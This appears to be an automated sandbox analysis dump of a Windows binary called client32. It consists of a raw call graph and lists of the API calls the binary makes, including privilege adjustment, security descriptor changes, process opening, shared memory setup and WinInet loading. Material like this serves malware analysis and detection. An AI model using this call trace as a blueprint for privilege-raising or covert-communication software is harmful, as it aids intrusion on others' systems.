RegOpenKeyExA 53465 11030f20 53464->53465 53466 1103103d 53464->53466 53467 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 
53465->53467 53468 11031061 53466->53468 53470 11031145 53466->53470 53469 11030f4a 53467->53469 53473 111101b0 std::locale::facet::_Facet_Register 200 API calls 53468->53473 53471 11031030 RegCloseKey 53469->53471 53474 11163ca7 std::locale::facet::_Facet_Register 55 API calls 53469->53474 53472 111101b0 std::locale::facet::_Facet_Register 200 API calls 53470->53472 53471->53466 53476 11031088 53472->53476 53473->53476 53475 11030f5e 53474->53475 53478 11163ca7 std::locale::facet::_Facet_Register 55 API calls 53475->53478 53477 110312db GetStockObject GetObjectA 53476->53477 53479 1103130a SetErrorMode SetErrorMode 53477->53479 53482 11030f92 53478->53482 53481 111101b0 std::locale::facet::_Facet_Register 200 API calls 53479->53481 53484 11031346 53481->53484 53482->53471 53483 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 53482->53483 53485 11030fe8 53483->53485 53487 111101b0 std::locale::facet::_Facet_Register 200 API calls 53484->53487 53486 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 53485->53486 53488 11031011 53486->53488 53489 11031386 53487->53489 53488->53471 53490 110313a3 InterlockedExchange 53489->53490 53491 111101b0 std::locale::facet::_Facet_Register 200 API calls 53490->53491 53492 110313c7 53491->53492 53493 110313e3 GetACP 53492->53493 53526 11163f93 53493->53526 53495 11031406 53535 111663a3 53495->53535 53497 11031410 53569 11143780 53497->53569 53500 111101b0 std::locale::facet::_Facet_Register 200 API calls 53501 1103145c 53500->53501 53575 11061aa0 53501->53575 53503 110314d4 53507 111101b0 std::locale::facet::_Facet_Register 200 API calls 53503->53507 53505 111101b0 std::locale::facet::_Facet_Register 200 API calls 53506 110314ae 53505->53506 53626 11061710 53506->53626 53509 11031501 53507->53509 53592 11125d40 53509->53592 53511 11031523 53512 111101b0 std::locale::facet::_Facet_Register 200 API calls 53511->53512 53513 1103155b 53512->53513 53514 111101b0 std::locale::facet::_Facet_Register 200 API 
calls 53513->53514 53515 1103158a 53514->53515 53601 1105d1a0 53515->53601 53517 110315d4 53608 11027810 53517->53608 53527 11163fc6 53526->53527 53528 11163fb1 53526->53528 53527->53528 53529 11163fcd 53527->53529 53639 1116a1af 43 API calls __getptd_noexit 53528->53639 53640 1117027b 70 API calls 6 library calls 53529->53640 53532 11163ff3 53533 11163fb6 53532->53533 53641 111700e4 50 API calls 5 library calls 53532->53641 53533->53495 53536 111663af _fgetc 53535->53536 53537 111663d0 53536->53537 53538 111663b9 53536->53538 53540 1116c675 __getptd 43 API calls 53537->53540 53665 1116a1af 43 API calls __getptd_noexit 53538->53665 53541 111663d5 53540->53541 53542 11171306 _setlocale 51 API calls 53541->53542 53543 111663df 53542->53543 53544 1116ac7e __calloc_crt 43 API calls 53543->53544 53545 111663f5 53544->53545 53546 111663be _fgetc _setlocale 53545->53546 53547 1117459f __lock 43 API calls 53545->53547 53546->53497 53548 1116640b 53547->53548 53642 11165814 53548->53642 53554 1116642f 53555 111664ec 53554->53555 53556 1116643b __expandlocale 53554->53556 53670 111710d5 8 API calls 53555->53670 53559 1117459f __lock 43 API calls 53556->53559 53558 111664f2 53671 1117116e 43 API calls 4 library calls 53558->53671 53561 11166461 53559->53561 53666 111712b9 51 API calls 3 library calls 53561->53666 53563 11166473 53667 111710d5 8 API calls 53563->53667 53565 11166479 53566 11166497 53565->53566 53668 111712b9 51 API calls 3 library calls 53565->53668 53669 111664e1 LeaveCriticalSection _doexit 53566->53669 53792 11143690 53569->53792 53571 11143795 53572 1103143c 53571->53572 53573 11143690 2 API calls 53571->53573 53574 11166654 64 API calls std::locale::facet::_Facet_Register 53571->53574 53572->53500 53573->53571 53574->53571 53576 11061710 225 API calls 53575->53576 53577 11061ade 53576->53577 53578 111101b0 std::locale::facet::_Facet_Register 200 API calls 53577->53578 53579 11061b0b 53578->53579 53580 11061b24 53579->53580 53581 11061710 225 API calls 
53579->53581 53582 111101b0 std::locale::facet::_Facet_Register 200 API calls 53580->53582 53581->53580 53583 11061b35 53582->53583 53584 11061710 225 API calls 53583->53584 53586 11061b4e 53583->53586 53584->53586 53585 11031487 53585->53503 53585->53505 53586->53585 53806 11061a70 53586->53806 53589 11061a70 211 API calls 53590 11061b94 53589->53590 53591 11061a70 211 API calls 53590->53591 53591->53585 53593 111101b0 std::locale::facet::_Facet_Register 200 API calls 53592->53593 53594 11125d74 53593->53594 53595 11125d8a 53594->53595 53598 11125da5 53594->53598 53928 110765c0 415 API calls std::locale::facet::_Facet_Register 53595->53928 53597 11125d9a 53597->53598 53599 11125e08 53598->53599 53929 110717d0 204 API calls std::locale::facet::_Facet_Register 53598->53929 53599->53511 53602 1105d1c1 53601->53602 53603 1105d1ad 53601->53603 53931 11001780 PostThreadMessageA 53602->53931 53930 110016d0 378 API calls std::locale::facet::_Facet_Register 53603->53930 53606 1105d1c6 53606->53517 53607 1105d1bd 53607->53517 53609 11027830 GetMessageA 53608->53609 53932 110cd940 53609->53932 53627 111101b0 std::locale::facet::_Facet_Register 200 API calls 53626->53627 53628 11061761 53627->53628 53629 11061777 InitializeCriticalSection 53628->53629 53944 11061210 202 API calls 3 library calls 53628->53944 53632 110617b7 53629->53632 53633 11061826 53629->53633 53945 1105f830 216 API calls 2 library calls 53632->53945 53633->53503 53635 110617d8 RegCreateKeyExA 53636 11061832 RegCreateKeyExA 53635->53636 53637 110617ff RegCreateKeyExA 53635->53637 53636->53633 53638 11061865 RegCreateKeyExA 53636->53638 53637->53633 53637->53636 53638->53633 53639->53533 53640->53532 53641->53533 53643 1116581d 53642->53643 53644 11165836 53642->53644 53643->53644 53672 11171046 8 API calls 53643->53672 53646 111664d5 53644->53646 53673 111744c6 LeaveCriticalSection 53646->53673 53648 11166422 53649 11166187 53648->53649 53650 111661b0 53649->53650 53655 111661cb 53649->53655 53652 11165e4d 
__setlocale_set_cat 108 API calls 53650->53652 53657 111661ba 53650->53657 53651 111662f5 53651->53657 53728 11165ac7 50 API calls 4 library calls 53651->53728 53652->53657 53653 1116631c 53674 11165c2c 53653->53674 53655->53651 53655->53653 53662 11166200 _strpbrk _strncmp _strcspn 53655->53662 53657->53554 53658 11166331 __expandlocale 53658->53651 53658->53657 53689 11165e4d 53658->53689 53660 11166257 _strlen 53660->53662 53662->53651 53662->53657 53662->53660 53663 1116630e __invoke_watson 53662->53663 53664 11165e4d __setlocale_set_cat 108 API calls 53662->53664 53727 111699f9 43 API calls _fgetc 53662->53727 53663->53657 53664->53662 53665->53546 53666->53563 53667->53565 53668->53566 53669->53546 53670->53558 53671->53546 53672->53644 53673->53648 53675 1116c675 __getptd 43 API calls 53674->53675 53676 11165c67 53675->53676 53677 11165d07 _strlen 53676->53677 53678 11165cba _strcpy_s 53676->53678 53680 11165cd4 53676->53680 53687 11165cfb __expandlocale 53677->53687 53678->53680 53678->53687 53680->53658 53681 11165d02 __invoke_watson 53681->53677 53682 11165de0 _memmove 53682->53687 53684 11165e0f _strcpy_s 53684->53680 53684->53687 53685 11165df9 _memmove 53685->53684 53687->53680 53687->53681 53687->53682 53687->53684 53687->53685 53729 1116593d _memset 53687->53729 53736 11174bcc 53687->53736 53768 11165a5c 46 API calls __setlocale_get_all 53687->53768 53769 111699f9 43 API calls _fgetc 53687->53769 53690 1116c675 __getptd 43 API calls 53689->53690 53691 11165e7a 53690->53691 53692 11165c2c __expandlocale 92 API calls 53691->53692 53693 11165ea2 __expandlocale 53692->53693 53694 11165ea9 53693->53694 53695 11165ed8 _strlen __malloc_crt 53693->53695 53694->53658 53695->53694 53696 11165eff _memmove _strcpy_s 53695->53696 53697 11165f71 _memmove 53696->53697 53698 1116617a __invoke_watson 53696->53698 53701 11165fb0 53697->53701 53712 11166071 _memcmp 53697->53712 53699 11166187 53698->53699 53700 111661b0 53699->53700 53708 111661cb 53699->53708 53702 
11165e4d __setlocale_set_cat 98 API calls 53700->53702 53710 111661ba 53700->53710 53707 1116604b ___crtGetStringTypeA 53701->53707 53701->53712 53702->53710 53703 1116631c 53709 11165c2c __expandlocale 92 API calls 53703->53709 53705 111660f0 53711 11163aa5 _free 43 API calls 53705->53711 53706 11166121 53713 1116612d InterlockedDecrement 53706->53713 53719 11166155 53706->53719 53707->53712 53708->53703 53723 111662f5 53708->53723 53726 11166200 _strpbrk _strncmp _strcspn 53708->53726 53714 11166331 __expandlocale 53709->53714 53710->53658 53711->53694 53712->53705 53712->53706 53715 11166145 53713->53715 53713->53719 53714->53710 53720 11165e4d __setlocale_set_cat 98 API calls 53714->53720 53714->53723 53716 11163aa5 _free 43 API calls 53715->53716 53717 1116614d 53716->53717 53718 11163aa5 _free 43 API calls 53717->53718 53718->53719 53719->53698 53720->53714 53721 11166257 _strlen 53721->53726 53723->53710 53791 11165ac7 50 API calls 4 library calls 53723->53791 53724 1116630e __invoke_watson 53724->53710 53725 11165e4d __setlocale_set_cat 98 API calls 53725->53726 53726->53710 53726->53721 53726->53723 53726->53724 53726->53725 53790 111699f9 43 API calls _fgetc 53726->53790 53727->53662 53728->53657 53730 11165962 53729->53730 53731 11165969 53729->53731 53730->53687 53734 11165985 _strcspn 53731->53734 53770 111699f9 43 API calls _fgetc 53731->53770 53733 11165999 __invoke_watson 53733->53734 53734->53730 53734->53733 53771 111699f9 43 API calls _fgetc 53734->53771 53737 1116c675 __getptd 43 API calls 53736->53737 53741 11174bd9 53737->53741 53738 11174be6 GetUserDefaultLCID 53749 11174c6d 53738->53749 53740 11174c10 53742 11174c78 53740->53742 53744 11174c22 53740->53744 53741->53738 53741->53740 53782 1117463f 64 API calls _CountryEnumProc@4 53741->53782 53742->53738 53745 11174c83 _strlen EnumSystemLocalesA 53742->53745 53747 11174c36 _GetLcidFromLanguage 53744->53747 53748 11174c2d 53744->53748 53745->53749 53750 11174c34 53747->53750 53783 11174b29 
_strlen _strlen 53748->53783 53761 11174dae 53749->53761 53772 111746a1 53749->53772 53750->53749 53787 1117463f 64 API calls _CountryEnumProc@4 53750->53787 53751 11174cde 53755 11174d03 IsValidCodePage 53751->53755 53751->53761 53754 11174c54 53754->53749 53757 11174c6f _GetLcidFromLanguage 53754->53757 53759 11174c66 53754->53759 53756 11174d15 IsValidLocale 53755->53756 53755->53761 53758 11174d28 53756->53758 53756->53761 53757->53749 53758->53761 53762 11174d79 GetLocaleInfoA 53758->53762 53763 11174d59 _strcpy_s 53758->53763 53760 11174b29 _GetLcidFromLangCountry 3 API calls 53759->53760 53760->53749 53761->53687 53762->53761 53765 11174d8a GetLocaleInfoA 53762->53765 53764 11174d6d __invoke_watson 53763->53764 53763->53765 53764->53762 53765->53761 53766 11174d9e 53765->53766 53788 1116c308 43 API calls _xtoa_s@20 53766->53788 53768->53687 53769->53687 53770->53734 53771->53734 53773 111746fb GetLocaleInfoW 53772->53773 53777 111746ab __expandlocale 53772->53777 53774 11174717 53773->53774 53775 111746ea 53773->53775 53774->53775 53776 1117471d GetACP 53774->53776 53775->53751 53776->53751 53777->53773 53778 111746c1 __expandlocale 53777->53778 53779 111746d2 GetLocaleInfoW 53778->53779 53780 111746ef 53778->53780 53779->53775 53789 11163c91 55 API calls __wcstoi64 53780->53789 53782->53740 53784 11174b5a _GetPrimaryLen 53783->53784 53785 11174b66 EnumSystemLocalesA 53784->53785 53786 11174b80 53785->53786 53786->53750 53787->53754 53788->53761 53789->53775 53790->53726 53791->53710 53793 111436a6 53792->53793 53795 11143763 53793->53795 53801 11081d30 53793->53801 53795->53571 53796 111436cb 53797 11081d30 IsDBCSLeadByte 53796->53797 53798 111436fb 53797->53798 53799 1114374d 53798->53799 53800 11143738 _memmove 53798->53800 53799->53571 53800->53799 53802 11081d3c 53801->53802 53804 11081d41 __mbschr_l std::locale::facet::_Facet_Register 53801->53804 53805 11081c50 IsDBCSLeadByte 53802->53805 53804->53796 53805->53804 53809 11061970 53806->53809 53808 
11061a96 53808->53589 53816 11061290 53809->53816 53811 110619ba 53824 11061320 53811->53824 53813 110619cc 53814 11061a08 53813->53814 53815 11061320 211 API calls 53813->53815 53814->53808 53815->53813 53817 111101b0 std::locale::facet::_Facet_Register 200 API calls 53816->53817 53818 110612ac 53817->53818 53819 110612b3 53818->53819 53854 1116305a std::exception::_Copy_str 53818->53854 53819->53811 53821 11061304 53855 111634b1 RaiseException 53821->53855 53823 11061319 53825 11061355 53824->53825 53852 11061624 std::ios_base::_Ios_base_dtor 53824->53852 53826 110614b4 53825->53826 53827 11061401 RegEnumValueA 53825->53827 53828 11061389 RegQueryInfoKeyA 53825->53828 53850 11061542 std::ios_base::_Ios_base_dtor 53826->53850 53826->53852 53856 110611e0 53826->53856 53830 1106149c 53827->53830 53841 11061435 53827->53841 53831 110613c2 53828->53831 53832 110613ae 53828->53832 53835 11163aa5 _free 43 API calls 53830->53835 53836 110613e2 53831->53836 53864 11029a70 198 API calls 2 library calls 53831->53864 53863 11029a70 198 API calls 2 library calls 53832->53863 53833 11081d30 IsDBCSLeadByte 53833->53841 53837 110614a9 53835->53837 53839 11163a11 _malloc 45 API calls 53836->53839 53837->53826 53844 110613f0 53839->53844 53840 1106146e RegEnumValueA 53840->53830 53840->53841 53841->53833 53841->53840 53841->53852 53865 11081e70 53841->53865 53843 110615a0 53843->53850 53876 11029a70 198 API calls 2 library calls 53843->53876 53844->53827 53848 1106151f 53875 1105fdc0 64 API calls _CountryEnumProc@4 53848->53875 53849 11081d30 IsDBCSLeadByte 53849->53850 53850->53843 53850->53849 53850->53852 53853 11081e70 66 API calls 53850->53853 53852->53813 53853->53850 53854->53821 53855->53823 53857 110611ee 53856->53857 53858 11061208 53856->53858 53877 110610f0 53857->53877 53858->53850 53860 11145bc0 53858->53860 53911 111434c0 53860->53911 53866 11081e7d 53865->53866 53867 11081e82 53865->53867 53926 11081c50 IsDBCSLeadByte 53866->53926 53869 11081e8b 53867->53869 53874 
11081e9f 53867->53874 53927 1116558e 64 API calls 2 library calls 53869->53927 53871 11081e98 53871->53841 53872 11081f03 53872->53841 53873 11166654 64 API calls std::locale::facet::_Facet_Register 53873->53874 53874->53872 53874->53873 53875->53850 53880 110609a0 53877->53880 53879 1106110b 53879->53858 53879->53879 53881 11060a24 53880->53881 53882 110609df 53880->53882 53881->53879 53888 11060820 53882->53888 53885 110609a0 204 API calls 53886 11060a16 53885->53886 53887 110609a0 204 API calls 53886->53887 53887->53881 53889 111101b0 std::locale::facet::_Facet_Register 200 API calls 53888->53889 53890 11060854 53889->53890 53891 11060862 53890->53891 53892 110608b9 53890->53892 53899 11060100 53891->53899 53903 1116305a std::exception::_Copy_str 53892->53903 53896 110608c8 53904 111634b1 RaiseException 53896->53904 53898 110608dd 53900 11060134 53899->53900 53901 11060141 53899->53901 53905 1105f7c0 53900->53905 53901->53885 53903->53896 53904->53898 53906 1105f7d2 53905->53906 53907 11110230 199 API calls 53906->53907 53908 1105f7e2 53907->53908 53912 111434d0 53911->53912 53912->53912 53917 11110230 53912->53917 53914 111434f8 53924 111433d0 MultiByteToWideChar WideCharToMultiByte GetLastError _strncpy __crtCompareStringA_stat 53914->53924 53916 11143506 53916->53848 53918 11163a11 _malloc 45 API calls 53917->53918 53919 1111023e 53918->53919 53920 11110247 53919->53920 53921 1111025e _memset 53919->53921 53925 11029a70 198 API calls 2 library calls 53920->53925 53921->53914 53924->53916 53926->53867 53927->53871 53928->53597 53929->53599 53930->53607 53931->53606 53933 111103d0 ___DllMainCRTStartup 4 API calls 53932->53933 53934 110cd955 EnterCriticalSection 53933->53934 53944->53629 53945->53635 53946 11116880 53960 11145ef0 53946->53960 53949 111168c5 53950 111168a8 53949->53950 53951 111168d4 CoInitialize CoCreateInstance 53949->53951 53953 11116904 LoadLibraryA 53951->53953 53959 111168f9 53951->53959 53952 11145c70 std::locale::facet::_Facet_Register 72 
API calls 53952->53949 53954 11116920 GetProcAddress 53953->53954 53953->53959 53957 11116930 SHGetSettings 53954->53957 53958 11116944 FreeLibrary 53954->53958 53955 111169e1 CoUninitialize 53956 111169e7 53955->53956 53957->53958 53958->53959 53959->53955 53959->53956 53961 11145c70 std::locale::facet::_Facet_Register 72 API calls 53960->53961 53962 1111689e 53961->53962 53962->53949 53962->53950 53962->53952 53963 1102ebd0 53964 1102ec13 53963->53964 53965 111101b0 std::locale::facet::_Facet_Register 200 API calls 53964->53965 53966 1102ec1a 53965->53966 53967 11143780 66 API calls 53966->53967 53968 1102ec64 53967->53968 53969 1102ec91 53968->53969 53970 11081e70 66 API calls 53968->53970 53972 11143780 66 API calls 53969->53972 53971 1102ec76 53970->53971 53973 11081e70 66 API calls 53971->53973 53974 1102ecba 53972->53974 53973->53969 53975 11163ca7 std::locale::facet::_Facet_Register 55 API calls 53974->53975 53979 1102ecc7 53974->53979 53975->53979 53976 1102ecf6 53977 1102ed68 53976->53977 53978 1102ed4f GetSystemMetrics 53976->53978 53981 1102ed82 CreateEventA 53977->53981 53978->53977 53980 1102ed5e 53978->53980 53979->53976 53982 11145c70 std::locale::facet::_Facet_Register 72 API calls 53979->53982 53983 11147060 std::locale::facet::_Facet_Register 16 API calls 53980->53983 53984 1102ed95 53981->53984 53985 1102eda9 53981->53985 53982->53976 53983->53977 54809 11029a70 198 API calls 2 library calls 53984->54809 53987 111101b0 std::locale::facet::_Facet_Register 200 API calls 53985->53987 53988 1102edb0 53987->53988 53989 1102edd0 53988->53989 54810 11110de0 53988->54810 53991 111101b0 std::locale::facet::_Facet_Register 200 API calls 53989->53991 53992 1102ede4 53991->53992 53993 11110de0 377 API calls 53992->53993 53994 1102ee04 53992->53994 53993->53994 53995 111101b0 std::locale::facet::_Facet_Register 200 API calls 53994->53995 53996 1102ee83 53995->53996 53997 1102eeb3 53996->53997 53998 11061aa0 234 API calls 53996->53998 53999 111101b0 
std::locale::facet::_Facet_Register 200 API calls 53997->53999 53998->53997 54000 1102eecd 53999->54000 54001 1102eef2 FindWindowA 54000->54001 54002 11061710 225 API calls 54000->54002 54004 1102f032 54001->54004 54005 1102ef2b 54001->54005 54002->54001 54271 11061ef0 54004->54271 54005->54004 54009 1102ef43 GetWindowThreadProcessId 54005->54009 54007 1102f044 54008 11061ef0 203 API calls 54007->54008 54010 1102f050 54008->54010 54011 11147060 std::locale::facet::_Facet_Register 16 API calls 54009->54011 54012 11061ef0 203 API calls 54010->54012 54013 1102ef60 OpenProcess 54011->54013 54015 1102f05c 54012->54015 54013->54004 54014 1102ef7d 54013->54014 54019 11147060 std::locale::facet::_Facet_Register 16 API calls 54014->54019 54016 1102f073 54015->54016 54017 1102f06a 54015->54017 54276 111464e0 54016->54276 54838 11028360 99 API calls std::locale::facet::_Facet_Register 54017->54838 54022 1102efb0 54019->54022 54020 1102f06f 54020->54016 54024 1102efef CloseHandle FindWindowA 54022->54024 54027 11147060 std::locale::facet::_Facet_Register 16 API calls 54022->54027 54023 1102f082 54025 1102f086 54023->54025 54285 1102a6d0 IsJPIK 54023->54285 54028 1102f022 54024->54028 54029 1102f014 GetWindowThreadProcessId 54024->54029 54295 11145990 ExpandEnvironmentStringsA 54025->54295 54031 1102efc2 SendMessageA WaitForSingleObject 54027->54031 54032 11147060 std::locale::facet::_Facet_Register 16 API calls 54028->54032 54029->54028 54031->54024 54034 1102efe2 54031->54034 54035 1102f02f 54032->54035 54033 1102f0a3 54304 11143e00 54033->54304 54037 11147060 std::locale::facet::_Facet_Register 16 API calls 54034->54037 54035->54004 54039 1102efec 54037->54039 54038 1102f0b5 54040 1102f177 54038->54040 54312 11063880 54038->54312 54039->54024 54316 11027b20 54040->54316 54042 1102f0d6 54042->54040 54044 110b7df0 std::locale::facet::_Facet_Register 9 API calls 54042->54044 54047 1102f1bd 54333 110287a0 54047->54333 54048 1102f19c std::locale::facet::_Facet_Register 
54048->54047 54050 1102ad70 std::locale::facet::_Facet_Register 113 API calls 54048->54050 54052 1102f1b0 54050->54052 54054 1102ad70 std::locale::facet::_Facet_Register 113 API calls 54052->54054 54056 1102f1b7 54054->54056 54332 11143a30 _strncpy 54056->54332 54272 11061f66 54271->54272 54275 11061f17 54271->54275 54272->54007 54273 11081e70 66 API calls 54273->54275 54275->54272 54275->54273 54886 11061e10 203 API calls 2 library calls 54275->54886 54277 111457a0 std::locale::facet::_Facet_Register 198 API calls 54276->54277 54278 111464fb wsprintfA 54277->54278 54279 111457a0 std::locale::facet::_Facet_Register 198 API calls 54278->54279 54280 11146517 wsprintfA 54279->54280 54281 11143e00 std::locale::facet::_Facet_Register 3 API calls 54280->54281 54282 11146534 54281->54282 54283 11143e00 std::locale::facet::_Facet_Register 3 API calls 54282->54283 54284 11146549 54282->54284 54283->54284 54284->54023 54286 1102a705 54285->54286 54294 1102a765 54285->54294 54287 111101b0 std::locale::facet::_Facet_Register 200 API calls 54286->54287 54288 1102a70c 54287->54288 54289 1102a73b 54288->54289 54291 11061aa0 234 API calls 54288->54291 54290 11063880 287 API calls 54289->54290 54292 1102a759 54290->54292 54291->54289 54292->54294 54887 110d1930 54292->54887 54294->54025 54296 111459c7 54295->54296 54297 111459d4 54296->54297 54298 111459e4 std::locale::facet::_Facet_Register 54296->54298 54299 111459fe 54296->54299 54297->54033 54301 111459f5 GetModuleFileNameA 54298->54301 54300 111457a0 std::locale::facet::_Facet_Register 198 API calls 54299->54300 54302 11145a04 54300->54302 54301->54302 54303 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 54302->54303 54303->54297 54305 11143e21 CreateFileA 54304->54305 54307 11143ebe FindCloseChangeNotification 54305->54307 54308 11143e9e 54305->54308 54311 11143ed7 54307->54311 54309 11143ea2 CreateFileA 54308->54309 54310 11143edb 54308->54310 54309->54307 54309->54310 54310->54038 54311->54038 54313 110638a8 
54312->54313 54948 110627b0 54313->54948 54315 110638c2 std::locale::facet::_Facet_Register 54315->54042 54317 11061a70 211 API calls 54316->54317 54318 11027b54 54317->54318 54319 11027c38 54318->54319 54320 11027bbf LoadIconA 54318->54320 54321 11145ef0 std::locale::facet::_Facet_Register 72 API calls 54318->54321 54325 11027cec 54319->54325 54330 11081e70 66 API calls 54319->54330 54331 11145c70 std::locale::facet::_Facet_Register 72 API calls 54319->54331 55470 11061e10 203 API calls 2 library calls 54319->55470 54322 11027bda GetSystemMetrics GetSystemMetrics LoadImageA 54320->54322 54327 11027bd1 54320->54327 54326 11027ba2 LoadLibraryExA 54321->54326 54323 11027c13 54322->54323 54324 11027bff LoadIconA 54322->54324 54323->54319 54329 11027c17 GetSystemMetrics GetSystemMetrics LoadImageA 54323->54329 54324->54323 54325->54048 54326->54320 54326->54324 54327->54322 54329->54319 54330->54319 54331->54319 54332->54047 54334 11147060 std::locale::facet::_Facet_Register 16 API calls 54333->54334 54335 110287c6 54334->54335 54336 110288b4 54335->54336 54337 110287dd GetModuleFileNameA 54335->54337 55471 11013dd0 17 API calls std::locale::facet::_Facet_Register 54336->55471 54339 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 54337->54339 54341 11028801 54339->54341 54340 110288c7 54811 111101b0 std::locale::facet::_Facet_Register 200 API calls 54810->54811 54812 11110e11 54811->54812 54813 11110e33 GetCurrentThreadId InitializeCriticalSection 54812->54813 54814 111101b0 std::locale::facet::_Facet_Register 200 API calls 54812->54814 54817 11110ea0 EnterCriticalSection 54813->54817 54818 11110e93 InitializeCriticalSection 54813->54818 54816 11110e2c 54814->54816 54816->54813 56334 1116305a std::exception::_Copy_str 54816->56334 54819 11110f5a LeaveCriticalSection 54817->54819 54820 11110ece CreateEventA 54817->54820 54818->54817 54819->53989 54822 11110ee1 54820->54822 54823 11110ef8 54820->54823 56336 11029a70 198 API calls 2 library calls 54822->56336 

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 1109D860: GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,AB86ACF8,00080000,00000000,?), ref: 1109D88D
                                                                                • Part of subcall function 1109D860: OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                                • Part of subcall function 1109D860: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                                • Part of subcall function 1109D860: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                              • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,AB86ACF8,00080000,00000000,?), ref: 1109E645
                                                                              • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E65E
                                                                              • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E669
                                                                              • GetVersionExA.KERNEL32(?), ref: 1109E680
                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E6EE
                                                                              • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E703
                                                                              • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E714
                                                                              • CreateFileMappingA.KERNEL32(000000FF,11030703,00000004,00000000,?,?), ref: 1109E750
                                                                              • GetLastError.KERNEL32 ref: 1109E75D
                                                                              • LocalFree.KERNEL32(?), ref: 1109E786
                                                                              • LocalFree.KERNEL32(?), ref: 1109E793
                                                                              • GetLastError.KERNEL32 ref: 1109E7B0
                                                                              • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E7CE
                                                                              • LocalFree.KERNEL32(?), ref: 1109E7F9
                                                                              • LocalFree.KERNEL32(?), ref: 1109E806
                                                                                • Part of subcall function 1109D7D0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E69E), ref: 1109D7D8
                                                                                • Part of subcall function 1109D810: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D824
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E832
                                                                              • LocalFree.KERNEL32(?), ref: 1109E8FB
                                                                              • LocalFree.KERNEL32(?), ref: 1109E908
                                                                              • _memset.LIBCMT ref: 1109E920
                                                                              • GetTickCount.KERNEL32 ref: 1109E928
                                                                              • GetCurrentProcessId.KERNEL32 ref: 1109E9D4
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E9EF
                                                                              • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109EA3B
                                                                              • GetLastError.KERNEL32 ref: 1109EA44
                                                                              • GetLastError.KERNEL32(00000000), ref: 1109EA4B
                                                                              • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EA80
                                                                              • GetLastError.KERNEL32 ref: 1109EA89
                                                                              • GetLastError.KERNEL32(00000000), ref: 1109EA90
                                                                              • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109EAC6
                                                                              • GetLastError.KERNEL32 ref: 1109EACF
                                                                              • GetLastError.KERNEL32(00000000), ref: 1109EAD6
                                                                              • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EB0B
                                                                              • GetLastError.KERNEL32 ref: 1109EB1A
                                                                              • GetLastError.KERNEL32(00000000), ref: 1109EB1D
                                                                              • LocalFree.KERNEL32(?), ref: 1109EB45
                                                                              • LocalFree.KERNEL32(?), ref: 1109EB52
                                                                              • GetCurrentThreadId.KERNEL32 ref: 1109EB83
                                                                              • CreateThread.KERNEL32(00000000,00002000,Function_0009E140,00000000,00000000,00000030), ref: 1109EB9D
                                                                              • ResetEvent.KERNEL32(?), ref: 1109EBCC
                                                                              • ResetEvent.KERNEL32(?), ref: 1109EBD2
                                                                              • ResetEvent.KERNEL32(?), ref: 1109EBD8
                                                                              • SetEvent.KERNEL32(?), ref: 1109EBDE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                              • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                              • API String ID: 3291243470-2792520954

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(WinInet.dll,AB86ACF8,74DF23A0,?,00000000), ref: 11029BE5
                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029C7F
                                                                              • SetLastError.KERNEL32(00000078), ref: 11029C93
                                                                              • _malloc.LIBCMT ref: 11029CB7
                                                                              • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029CD1
                                                                              • GetLastError.KERNEL32 ref: 11029CF2
                                                                              • _free.LIBCMT ref: 11029CFE
                                                                              • _malloc.LIBCMT ref: 11029D07
                                                                              • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029D21
                                                                              • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 11029D5B
                                                                              • InternetOpenA.WININET(11195264,?,?,000000FF,00000000), ref: 11029D7A
                                                                              • SetLastError.KERNEL32(00000078), ref: 11029D84
                                                                              • SetLastError.KERNEL32(00000078), ref: 11029D91
                                                                              • SetLastError.KERNEL32(00000078), ref: 11029D9B
                                                                              • _free.LIBCMT ref: 11029DA5
